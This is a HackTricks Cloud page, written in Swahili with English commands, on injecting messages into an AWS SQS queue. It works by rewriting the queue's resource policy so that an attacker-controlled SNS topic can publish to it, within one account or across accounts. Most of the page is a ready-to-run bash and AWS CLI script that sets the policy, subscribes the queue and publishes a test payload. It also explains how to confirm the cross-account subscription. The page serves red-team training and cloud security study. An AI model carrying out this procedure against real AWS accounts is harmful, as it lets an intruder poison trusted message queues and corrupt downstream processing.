AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Maelezo

Tumia vibaya sera ya rasilimali ya SQS queue ili kumruhusu topic ya SNS inayodhibitiwa na mshambulizi kuchapisha ujumbe ndani ya SQS queue ya waathiriwa. Katika akaunti ile ile, subscription ya SQS kwa topic ya SNS inathibitishwa kiotomatiki; kwa cross-account, lazima usome token ya SubscriptionConfirmation kutoka kwenye queue na uitumie ConfirmSubscription. Hii inawawezesha injection ya ujumbe isiyo imara ambayo matumiaji wa mwisho wanaweza kuitegemea bila kujua.

Mahitaji

Uwezo wa kubadilisha sera ya rasilimali ya SQS queue lengwa: sqs:SetQueueAttributes kwenye queue ya waathiriwa.
Uwezo wa kuunda/kuchapisha kwenye topic ya SNS inayodhibitiwa na mshambulizi: sns:CreateTopic, sns:Publish, na sns:Subscribe kwenye akaunti/topic ya mshambulizi.
Kwa cross-account pekee: kwa muda sqs:ReceiveMessage kwenye queue ya waathiriwa ili kusoma token ya uthibitisho na uitumie sns:ConfirmSubscription.

Utekelezaji katika akaunti ile ile

bash

REGION=us-east-1
# 1) Create victim queue and capture URL/ARN
Q_URL=$(aws sqs create-queue --queue-name ht-victim-q --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Create attacker SNS topic
TOPIC_ARN=$(aws sns create-topic --name ht-attacker-topic --region $REGION --query TopicArn --output text)

# 3) Allow that SNS topic to publish to the queue (queue resource policy)
cat > /tmp/ht-sqs-sns-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSTopicPublish","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"SQS:SendMessage","Resource":"REPLACE_QUEUE_ARN","Condition":{"StringEquals":{"aws:SourceArn":"REPLACE_TOPIC_ARN"}}}]}
JSON
sed -i.bak "s#REPLACE_QUEUE_ARN#$Q_ARN#g; s#REPLACE_TOPIC_ARN#$TOPIC_ARN#g" /tmp/ht-sqs-sns-policy.json
# Provide the attribute as a JSON map so quoting works reliably
cat > /tmp/ht-attrs.json <<JSON
{
"Policy": "REPLACE_POLICY_JSON"
}
JSON
# Embed the policy file contents as a JSON string
POL_ESC=$(jq -Rs . /tmp/ht-sqs-sns-policy.json)
sed -i.bak "s#\"REPLACE_POLICY_JSON\"#$POL_ESC#g" /tmp/ht-attrs.json
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-attrs.json

# 4) Subscribe the queue to the topic (auto-confirms same-account)
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION

# 5) Publish and verify injection
aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All

Vidokezo kati ya akaunti

Sera ya queue iliyotajwa hapo juu lazima iruhusu TOPIC_ARN wa kigeni (akaunti ya mshambuliaji).
Subscriptions hazitathibitishwa kiotomatiki. Jipe ruhusa ya muda ya sqs:ReceiveMessage kwenye queue ya mwathiriwa ili usome ujumbe wa SubscriptionConfirmation na kisha piga sns confirm-subscription ukiwa na Token wake.

Athari

Athari Inayowezekana: Kuingizwa kwa ujumbe usiohitajika kwa mfululizo katika queue ya SQS ya kuaminika kupitia SNS, inaweza kusababisha usindikaji usiokusudiwa, uchafuzi wa data, au matumizi mabaya ya workflow.

tip